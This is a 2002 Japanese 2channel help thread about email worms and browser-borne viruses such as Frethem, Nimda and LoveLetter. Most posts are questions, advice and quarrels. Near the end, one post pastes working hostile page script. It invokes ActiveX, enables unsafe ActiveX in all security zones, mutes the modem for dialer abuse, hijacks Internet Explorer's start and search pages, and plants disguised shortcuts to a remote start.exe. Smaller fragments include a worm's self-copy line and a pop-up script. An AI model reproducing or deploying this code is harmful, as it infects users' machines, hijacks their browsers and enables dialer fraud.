名無しさん@お腹いっぱい。 :02/07/17 10:37
frethemとかメール勝手に送って増殖する奴に かかって取引先から苦情が来てる人が職場にいるんだけど そういうのを見ると アドレス帳は別のところに保存しといた方がいいんですか? でも調べてみたらアドレス帳載ってる人以外にも 送ってるみたいだし。 なにかいい対応策ありますか?
そういう奴は隔離ネットワークに収監する。
856 :
名無しさん@お腹いっぱい。 :02/07/17 11:01
ははは。 でも笑いごとじゃなくてウイルス駆除ソフトで対応する前に ウイルスにかかってしまうことは考えられることなので、 最低限他の人には広めさせたくないっていうようにしたい。 ウイルス自体にメアドを参照させないようにするっていうのは どうすればいいんだろうか。 それか自分以外が送信できないようにすればいいのかな。 パスワドかけるとかして。
857 :
名無しさん@お腹いっぱい。 :02/07/17 11:06
プレビューしただけで感染するのはなぜ? プレビューって、勝手に添付のexe実行しちゃうの?
>>857 exeだけがプログラムじゃないの。
Webページを表示するのだって…と考えてみれば?
>>856 最近のウィルスは自前で送信するのでメーラにパスワードかけても意味ないです。
メアドもPC内を検索するのでどこに置いても参照されうる。
>>855 が最善の策と思うが。ダブルクリック厨にはつける薬無し。
860 :
名無しさん@お腹いっぱい。 :02/07/17 11:12
>>856 最大のセキュリティホールは無自覚なユーザなのだよ。
そしてセキュリティの固さはもっとも弱いところで決まるので、
馬 鹿 が い る 限 り 何 を やっ て も 無 駄。
862 :
名無しさん@お腹いっぱい。 :02/07/17 11:15
>>858 FRETHEM.Kはexeが添付されてるんでしょ?
なぜ、プレビューで実行されるんかな?
864 :
名無しさん@お腹いっぱい。 :02/07/17 11:24
865 :
名無しさん@お腹いっぱい。 :02/07/17 11:26
この穴がいまさら突かれるのは購入時のまま使用しているユーザがとても多いという事でいい? とすると、数ヵ月後にそういうユーザが貯まったところで、また流行?
>>864 USBポートに差しっ放しにしなければ大丈夫だろうが、ウィルスは
ブラウザのキャッシュからもメアド拾うので感染したらどこかしらへは
送信してしまうだろうね。送信先はアドレス帳だけではないということ。
868 :
名無しさん@お腹いっぱい。 :02/07/17 11:30
IEコンポーネント使用メーラーはOEとBeckyの他、なにがありますか?
NTTからfrethem飛ばしてスマソって電話がかかってきた
>>866 アンチウィルスソフトで駆除したら終わり、じゃなくてIEのバージョン
アップもきちんと指摘・指導して欲しいね。>マスコミ各社
たしかにこれじゃ繰り返しだよ。
>866 新規購入者だけとは限らん。 klezの時だって、「ウィルスメールなんて一通も来なかったよ。 セキュリティホール?パッチ?ワクチンソフト?何のことかサパーリワカラソ」 と平気でのたまうヤシはそこらへんにうじゃうじゃいる。
872 :
名無しさん@お腹いっぱい。 :02/07/17 13:06
>>869 >NTTからfrethem飛ばしてスマソって電話がかかってきた
どこを見ればfrethemの送信先ってわかるだろう。
教えてほしいす。
OEの送信済みアイテムには無いし。
873 :
名無しさん@お腹いっぱい。 :02/07/17 13:09
876 :
名無しさん@お腹いっぱい。 :02/07/17 13:41
878 :
名無しさん@お腹いっぱい。 :02/07/17 13:44
879 :
名無しさん@お腹いっぱい。 :02/07/17 13:57
>>872 大手企業ならSMTPを自前で持ってるんだから
ログ見りゃわかるじゃん。
つうかOEのワーム系ウィルスって
ほとんど対策済みのセキュリティホール突いてるんだから
パッチくらいちゃんと当ててくれ
俺はOE使ってないからそんなん知らんとかじゃなくてさ
880 :
名無しさん@お腹いっぱい。 :02/07/17 14:01
881 :
名無しさん@お腹いっぱい。 :02/07/17 14:20
882 :
名無しさん@お腹いっぱい。 :02/07/17 17:09
パッチ当ててればプレビューしても感染しないの?
884 :
名無しさん@お腹いっぱい。 :02/07/17 17:19
885 :
名無しさん@お腹いっぱい。 :02/07/17 18:47
実行されたアクション:
添付ファイルはメッセージから隔離され、受信者が実行したアクションを通知するテ
キスト ファイルに置き変えました。
宛先:
[email protected] <
[email protected] >
送信者:
[email protected] <
[email protected] >
送信時刻:
709959936,29502659
件名:
Re: Your password!
添付ファイルの詳細:-
添付ファイル名: decrypt-password.exe
ファイル: decrypt-password.exe
感染? はい
修復済み? いいえ
ブロック済み? いいえ
削除済み? いいえ
ウイルス名: W32/Frethem.l@MM
こんなメールが着たんだけどなんですか?
886 :
名無しさん@お腹いっぱい。 :02/07/17 19:05
887 :
名無しさん@お腹いっぱい。 :02/07/17 19:07
888 :
名無しさん@お腹いっぱい。 :02/07/17 19:08
ということは安全ってことですね。 ヨカター
c.Copy(dirsystem&"\重複.TXT.vbs")
覚えたてでうれしいね。
ウイルスがホットメールで送られてきました。なんか、スペイン語で メールが送られてきます。ホットメールって添付ファイルが自動的に ウイルスチェックされるので無用心ながらも添付を開いてしまい、 感染してしまった模様です。ちなみに、その添付ファイルは225Kバイト くらいです。消しても消しても<30>というファイルがでてくるし、 <BanderaNegra>って言うファイルも作られます。それも、c:\にです。 どなたか対処方法を御存知の方はいらっしゃいませんでしょうか? トレンドマイクロ社の30日つかえる無料のウイルス検知ソフトを 入れてみたのですが、ウイルス除去できないみたいなのです。隔離しか。
894 :
名無しさん@お腹いっぱい。 :02/07/17 20:25
どなたか、対処方法をおしえてください。おねがいします。
このスレ、かちゅで見れないぞ〜 「削除かあぼーんでログが詰まった可能性がありますです」 になってしまって、新しいdll当てても見られない。 ブラウザで開くと見れるんだが・・・・
zonavirus.dll っていうファイルもみつかりました。 ゾナウイルスっていうらしいです。どなたか、ほんとによろしくお願いします。
898 :
名無しさん@お腹いっぱい。 :02/07/17 21:06
>>898 ありがとうございます。今検索して、知り合いに僕からのメールは
開かないようにメール送ったところでした。
901 :
これってなんでしょうか? :02/07/18 01:56
ご回答よろしくお願いします。 この質問をソニーの社員スレッドでしたのですが全然回答がありませんでした。 重大な秘密でもあるのでしょうか? 私はVAIOを使ってます。 最近監視ソフトを買いました。 毎日インターネットつなげるとアタックの警告音とともにVAIOの方から勝手に パソコンの中に何度も進入してきます。 私のパソコンの中でいったい何をしているのでしょうか? ソニーさんのパソコンを使うと勝手にパソコンに侵入してこれるように 何かしているのでしょうか? 侵入の警告音がなりっぱなしで気持ち悪いです。
>>901 ソニィ社員だが、何か?
おまいの言っていることがサパーリわからん。
まともな者にわかるよーにしっかり述べよ。
904 :
名無しさん@お腹いっぱい。 :02/07/18 02:26
>>902 901です。
ソニィ社員、おまいとか言うような方が本当に有名な
ソニーの社員の方かどうかわかりませんがよろしくお願いします。
私も何が起こっているのかわかりません。
パソコンへの不正侵入を監視するソフトをインストールすると
VAIOさんへ繋いでいないのに
以下のような表示が出て警告音が鳴らされます。
パソコンへの侵入者を監視するソフトの表示です。
アタック Ping Sweep
侵入者 VAIO
IP: *.*.*.* DNS: VAIO
IPがいろいろ変わってきます。
必要ならIPも掲載します。
YAVAIO
さっき質問させて頂いてものですが、削除できません。 レジストリの所を書いてある通りにいじりたいのですが、 書いてあるもの自体がありません。 これを書かないと分からない! って言う方がいらっしゃると思いますので、まずは何から書けばいいのか お教えください。
>>906 = やくざ
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
にある項目と値全部。
>>907 コピペしてもsageられないような事を書くなよ。
>>908 (既定) (値の設定無し)
というのがあって、これだけ削除できません。。。
「指定された値を全て削除できません」とでます。
なんか、悲しくなってきました・・・。
>>909 ・・・これって残って当然ですね。
全部消したんですが、まだ再起動して立ち上げると
c:¥にあるんですよ。。。。どうしてでしょうか?
>>910 あのさ、おれがだしたURLのとこ、ちゃんと読んだか?
読んでないよな?最後までちゃんと読めよ?
書いてあること、全部やったか?
やってないよな?だから復活するんだぜ?
わかったらもう一回いってきな。
HKLMもと思ったけど。なんか殺伐としてんな。
気になることがあるのですが、Dのプログラムフォルダーが縮小表示 の画像と画像なしで点滅状態になってるのと指定していない画像が 縮小表示で別のホルダーに表示されます。もう一つは他のプログラム から利用されていますと出て削除できないファイルがあるのですが 原因わかる方いますか?
ファイル名を指定して実行の表示がregeditのままで消しても 表示されます。オートコンプリートはオフにしてるのですが なぜでしょうか?
916 :
名無し~3.EXE :02/07/18 07:40
レジストリのRUNにMSPY2002というのがありますが これ大丈夫ですか?IME調子悪いのですが。
>>914 読んでも症状はさっぱり分からないが、
ウイルスが心配なのならちゃんとスキャンする。
エクスプローラその他の表示や、削除できないファイルとかに
ついては、
http://homepage2.nifty.com/winfaq/ で確認しる。
>>915 それはWindowsの仕様。
ひょっとしたら変更する方法もあるかもしれないが、
Windows板のOSごと質問スレにでも逝ってくれ。
>>916 ウイルスなどが心配ならスキャンする。
スパイウェアが心配ならad-awareのスレに。
IMEについては辞書の修復してみたら?
>917 どうも答えてくれるとはありがとうございました。 915と916についてはなんでもないことがわかりました。 914だけはどうも解せない。DとCにXP一個ずつ2ついれてて Dの方がNAWインストール失敗して動かないんですよ。cのほうからだと アドミニの権限がないので全システムのスキャンができないし。 Cは調子いいのでDのほう削除してC一本にしたほうがいいですか?
>>918 >914〜916については、ちゃんとまとめてから環境と状況を
明確にして質問してくれ。せめて同一人物と分かるように
名前なりなんなり工夫してくれ。
で、それらと>918を併せ読んでも、なおかつ状況は明確でない。
一度、あんたが何を使ってどうしているのか全然知らない他人が
その文章だけでどれだけ理解できるかという「他人の目」で
読み返してくれんか。
NAWはNAVなのかなあ、とか、アドミン権限もなくて
一体何がしたいのかとか思う程度。
これじゃ、Windows板に誘導したものかどうかの判断もつかない。
920 :
名無しさん@お腹いっぱい。 :02/07/18 11:03
あのあるアドレスをクリックしたら、へんなページがいっぱい出てきて ノートンでTrojan Horseに感染しています。って表示されたのですが、 やばいですかね。
>919 アドミン権限が二つ別であるから、CのXPからDのXPは スキャンできないんですよ。2つ入れたのは比較の目的から。 それくらいわからないか。
>>913 そうか、すまんな、一応調べたんだな。
で、消しても復活してくるからには、消しきれてない上に
Windows起動時にどっかから読まれてるわけだが、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runの
記述を消しても現れるなら、WIN.INIやSYSTEM.INI,とかに仕込まれてたりしないか?
SAFEモードで起動してMSCONFIGでチェックしたらどーだ?
それと、こいつの本体はVBSなので、ActiveDesktopで呼び出されても発動するだろうな。
具体的には D:\Documents and Settings\XXX(1)\My Documents\新しいフォルダ をwipe infoで消したら、一つ消えないファイルがあって容量ゼロで 新しいフォルダが消えないという状態。DOSで消せと書いてるけど この場合だとどう打ち込んだらいいのか具体的に書いてないから こっちこそわからない。だいたいコマンドプロンプトまとめずわかるように 書けっつーの。学んでない人間のほうが多いんだそ。
>>921 >>919 の「同一人物が分かるように」との指摘さえきかず、
好き勝手なところだけ答えて逆切れしているし。
>>923 誰に文句いってんだよ、コイツ?
>919はキツイ面もあるかもしれんが、まだしも好意的に
このように質問しろと書いてくれているんだが、
それでも>921みたいに逆切れするのとか、>923みたいに
意味不明の独り言を書き込むようなヤカラには
もう無視っきゃないな。
放置されたくなければ、質問の仕方を考えろ。
受難の季節
(´-`).。oO(大変だなぁ)
(´-`).。oO(DQNでも最初から放置はせずに一応は答えてくれるんだね・・・)
929 :
名無しさん@お腹いっぱい。 :02/07/18 15:07
ウィルススキャン シタラ コンナンデマシタ! 「¥katjusha2102\log\cocoa.2ch.ne\4649\1026258903.dat VBS.Internalウィルスに感染しています。」 ナンジャコリャ? デス!
931 :
名無しさん@お腹いっぱい。 :02/07/18 17:43
ノートンでTrojan Horseに感染しています。って表示されたのですが どんな症状がでるのですか?
KLEZ.Hとやらに感染してました。 昨日やっとやっつけました。 けど、奇数月の6日になるまで安心できないと 脅されました。9月までワカンネーノカヨ(#・∀・)
934 :
名無しさん@お腹いっぱい。 :02/07/18 22:48
ApacheのLogに残るニムダやコードレッドがうざいのだが・・・ こいつらを駆逐出来るような CGIは作れないだろうか? ちなみにIISではないので実害はナシ
くだらねぇ質問はここに書き込め Ver2.18…に書きこんだのですが、 ちゃんと教えてくれません。もー 初心者ですが、宜しくお願いします。 AVGってFreeのウイルス駆除アプリをインストールしています。 先日、WEB検索中に"I-Worm/NIMDA.A.HTM"に感染してしまいました。 AVGで駆除した後に、MSのfixnimdaを実行したのですが、正常に 駆除されているか心配です。 I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名を教えてください。 また、I-Worm/NIMDA.A.HTMに感染したら、どのような動作をするの でしょうか?教えてください。
>>935 少し検索すればすぐわかるようなこと聞くな、このヴォケ!
937 :
名無しさん@お腹いっぱい。 :02/07/18 23:19
>936 調子に乗るなヴォケ! 初心者だろうが上級者だろうがここは聞きたい奴がくるところだ おまえは知識があるだろうが、暇人で傲慢だ 気分が悪い おまえが出て行けばすむことだ 来るな ヴォケ!
940 :
名無しさん@お腹いっぱい。 :02/07/18 23:28
>>938 まだいたのか?
あなたのように知識が豊富でないから教えられません。
出て行くか教えるかしてやれ
937さん有難うございます。 番号の前に>>の名無しさんは、お願いですから、かきこまないでください。 NIMDA.○にもいろいろあるので、I-Worm/NIMDA = I-Worm/NIMDA.A.HTM なのか自信が無かったのです。 ウイルス初感染なうえに知識が乏しいため、MSNでI-Worm/NIMDA.A.HTMを検索 して2CHにのみヒットした為、ここにきて聞きました。 ちょっと私も936さんに不満なもので、長々と書いてしまいました。 良識の有る方、お願いします。おしえてください。
>>940 だから検索するだけだよ。早くしてやれよ。
質問者もどんくさいな
944 :
名無しさん@お腹いっぱい。 :02/07/18 23:36
>>942 ひきこもりだな
パソコンの世界で逝きとけ
945 :
名無しさん@お腹いっぱい。 :02/07/18 23:37
ウィルスに関わる話題・質問はこちらに、、、 ※ただしここは心の狭いお偉いさんたちが暇してるので 質問は高度なものに限ります。 又は質問するな。 って但し書きが必要ですね。
ネタ歓迎〜★
951 :
おそねっ :02/07/18 23:40
くだらないことで言い合ってないで、私の質問に答えなさい。 どうせ暇なんでしょ。
>>951 このスレ1から読み返しなさいな。
それで解決する。
942さん、 I-Worm/NIMDA = I-Worm/NIMDA.A.HTM であっているのですね。 それならば、I-Worm/NIMDAでの処置は終了しています。 違っているのならば、別の検索のしかたを教えていただきたいです。
>>I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名 ニムダだろ。 あとは検索すればちゃーんと詳しく書いてあるHPが出てくるはず。
955 :
>>953 :02/07/18 23:53
違うけど処置は終わり。お疲れ。さよなら。
956 :
名無しさん@お腹いっぱい。 :02/07/18 23:53
最近、2chを見てると、 よくウィルスソフトから ラブレターウィルスの警告が出るんだけど、 みなさんはどうですか?
>>956 理由を知っているからなんとも思わない。
マルチの方がウザイ。
954さん、 ありがとうございました。 これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。 では、おやすみなさい。
955さん? 駆除とMSのfixnimda実行だけでは、いけないのでしょうか?
あれ?初心者の味方諸君はどこ行ったんだ?
>>949 を見て萎えたのか?
962 :
名無しさん@お腹いっぱい。 :02/07/19 00:49
>>960 ひきこもりが強がってら
弱虫は相手にされねーだけだろ
暇じゃねーんだよ ヴヲケ
(´-`).。oO(書き込みする暇はあるんだな・・・)
atamano yowasouna natutyu- dana... syosinsya ita atari kara nagarete kitano kana-
>>963 質問に対して回答する際、自分の記憶違い等も考慮し、調べなおしたりするのは
当たり前のこと。
例えば952が「このスレ1から読み返しなさいな。」といってるが、これで解決
できるのは確認してると思う。(これは推測だけど。)
俺なら、書き込む前に、確実に確認する。
たった1行の回答であっても、それなりの時間はかかるはず。それを理解できない
お前は回答したことがないか、いいかげんな回答をしたことがないかだろ。
>960、>おそねっ
初心者だから皆怒ってるんじゃなくて、モラルを欠いた言動をとっているから
怒っているのがわからないのか?
例えばウィルスの名称なんて、1でリンクしてるURLを見てくるだけでもわかるだろ。
「ウィルス情報」って書いてあるんだから。
(ちなみにネットワークアソシエイツのウィルス名検索では、nimdaの情報が一部リンク
はずれている。)
>これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
こんなのも本論、第三者である俺達とは関係ない。
自分のとった言動を正当化するために書いてるだけ。
この手のスレは自己中心的に質問し、自分だけが役に立てばいいのでなく、
これをみている他の人にも役立つように考慮するのは当然のこと。
(だからこそ、952の「このスレ1から読み返しなさいな。」というのが生きてくる。)
本論と関係ないカキコして、皆スマン。
(´-`).。oO(
>>962 あてだったんだが、ちゃんと書いとけばよかったな・・・)
</scri-->
<!--ipt
i="P";document.write("<AP"+i+"LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </A"+i+"PLET ");
var label8="ウィンドウズアップデトガイド 2002年";
var url8="
http://kanazawa.cool.ne.jp/pressing101/primera/start.exe ";
var icofile8="%WinDir%\\System\\User.exe";
var iconum8="4";
var label="無修正AV画像";
var url="
http://kanazawa.cool.ne.jp/pressing101/primera/start.exe ";
var icofile="%WinDir%\\System\\User.exe";
var iconum="1";
function savefavfile(folder,label,url,icofile,iconum){
var oFi=FSO.CreateTextFile(folder+"\\"+label+".url");
oFi.WriteLine("[InternetShortcut]");
oFi.WriteLine("URL="+url);
oFi.WriteLine("Modified=806188A46609C1013E");
oFi.WriteLine("IconIndex="+iconum);
oR=/%windir%/i;icofile=icofile.replace(oR,WinDir);
oFi.WriteLine("IconFile="+icofile);
oFi.Close();
}
function putfav(folder, folder2, folder3){
// savefavfile(folder3,label8,url8,icofile8,iconum8);
savefavfile(folder,label,url,icofile,iconum);
savefavfile(folder,"おまんこ無修正ネットアイドル","
http://kanazawa.cool.ne.jp/pressing101/primera/start.exe ","%WinDir%\\Mplayer.exe","3");
savefavfile(folder,"ファック無修正画像・映像","
http://kanazawa.cool.ne.jp/pressing101/primera/start.exe ","C:\\Program Files\\Internet Explorer\\Iexplore.exe","16");
}
function SetSrch(){ Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004", 00,"REG_DWORD"); Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004", 00,"REG_DWORD"); Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004", 00,"REG_DWORD"); Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004", 00,"REG_DWORD"); Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD"); Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0"); Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1"); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr "); // Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01"); // Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01"); Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY"); // Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchURL","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Local Page","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Bar","
http://www.idol-heaven.com/?id=martin ");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\SearchUrl","
http://www.idol-heaven.com/?id=martin ");
}
971 :
ひみつの検疫さん :2025/03/23(日) 12:36:59 ID:MarkedRes
汚染を除去しました。
Shl.regwrite(regkey,filename); // // // } catch(e){ return; } } function init(){ setTimeout("f()", 1000); } init(); </SCRI--> <!--ECT CLASSID ="CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC899" CODEBASE="redir.exe" </OBJE--> </BODY></HTML>
実社会でも、「ボランティア」「奉仕」「手伝い」を他人に強要するヤシには、まともな人はいませぬ。 そゆのはあくまでも「任意・好意・善意もしくは気まぐれ」に基づく行動ですんで。
974 :
名無しさん@お腹いっぱい。 :02/07/19 19:18
恐らくウイルス入りと思われるリンク先真っ白なフラッシュ踏んじゃったんだけど、どうすればいいでしょう?
>>974 ウィルスをだしにして他人の力を借りようとせずに、
本当にウィルスがあるのかないのか少なくともソースくらい読んで判断する。
>>974 ウイルスのスキャンをしたらどうっしょ。
ボランティアだから… といって他人に同じ行動(思想)を要求する奴もウザイ。
極端な例が貧民救済募金やってる女子大生。
>>973 「道楽」という行動原理があったりする。
979 :
名無しさん@お腹いっぱい。 :02/07/19 19:54
ウイルススキャンしても見つからない… でも後ろのレスで「踏むな」とか2つ位ついてたからウイルスに間違いない… どっかにIP表示されるくらいだったらいいんだけどなあ…
980 :
名無しさん@お腹いっぱい。 :02/07/19 21:15
>>977 青くせーこといってんなよ、な、カス。
こっちまで恥ずかしくなってくるだろ。
39 名前:名無しさん@3周年 投稿日:02/07/19 20:25 ID:3Lnf+EfE
サッカー監督、世界ベスト100
http://dms100.org/worksucks さっきこれ踏んだんですが大丈夫でしょうか?
うわさでは強力なウイルスって聞いたんだけど?
>>966 あってるよ。
962は「暇じゃねーんだよ ヴヲケ」と言ってるのに、
お前(963)は962に対して「書き込みする暇はあるんだな・・・」と言ってるんだろ。
962の発言は1分もあれば書けるが、回答は1行であっても時間はかかることを
965で俺は説明している。つまり、962の言ってること(暇がないこと)に矛盾はない
ことを代弁しているんだが、理解できないような文章だったか?
>>982 オマエ、「いいたいことがよくわからん」ってよくいわれるだろ?
オマエのような馬鹿はROMってるだけのほうがいいぜ。
984 :
名無しさん@お腹いっぱい。 :02/07/19 22:36
Norton AntiVirus 2002のウイルス定義は毎日更新しており、XP標準のファイアウォールをオンにしているにも関わらず、 「ファイルへのアクセスが拒否されました」のメッセージが表示され駆除・ファイル復元出来ず、 繰り返し同種のウイルス「VBS.LoveLetter.A」に感染します。 とりあえず、オフラインに切り替えてから検疫した後、XPのシステム復元で対処している現状です。 問題点・対処法として考えられる事をお教え頂けませんでしょうか
985 :
名無しさん@お腹いっぱい。 :02/07/19 22:43
>>985 <script>
function worksucks() {
window.open('1ame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
window.open('lame.html','','height=1,width=1,toolbar=no,directories=no,menubar=no,screenX=0,screenY=0,left=0,top=0');
}
</script>
こういう奴。
ウイルスもダウンロードされてくる。
988 :
名無しさん@お腹いっぱい。 :02/07/19 22:55
>>986 すみません。
初心者なものでよくわからないのですが
どんなウイルスがはいっているのですか?
デンジャラス
990 :
名無しさん@お腹いっぱい。 :02/07/19 23:04
きゅーきゅーしゃ
992 :
名無しさん@お腹いっぱい。 :02/07/19 23:12
>>992 クリクして飛んでみ。
At your oun riskで(w
つか、 http空けてカキコしると、ピロシキ規制に引っかかるのか。。。。
995 :
まじですか? :02/07/19 23:33
>>984 私も全く同じ環境で同じ現象になります。
同じように検疫して削除し続けてます。
今日ニュー速板に行く度に感染します。
ニュー速板がおかしいのか、私のPCがおかしいのか…。
>995 どっかにソースの染み付いて汚れてるんだよ。 着てる服良く見てみ。早く洗わないと落ちなくなるよ。 つか、感染ぢゃ無くて「検出」デショ・・・・
>>996 洗濯の仕方を教えてください…
教えて君ですみませんが…
すっぽんぽんなれや
>>997 そりゃチミ、熱いお湯で洗うがな。
それかソースの染み付いてるところ良く探し出してアボンしてもらうしか無いがな。
・・・そうそう、意外と絵とか模様書いてあるところは見落としがち・・・
「アボン」は洗剤ね。。。
1000
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。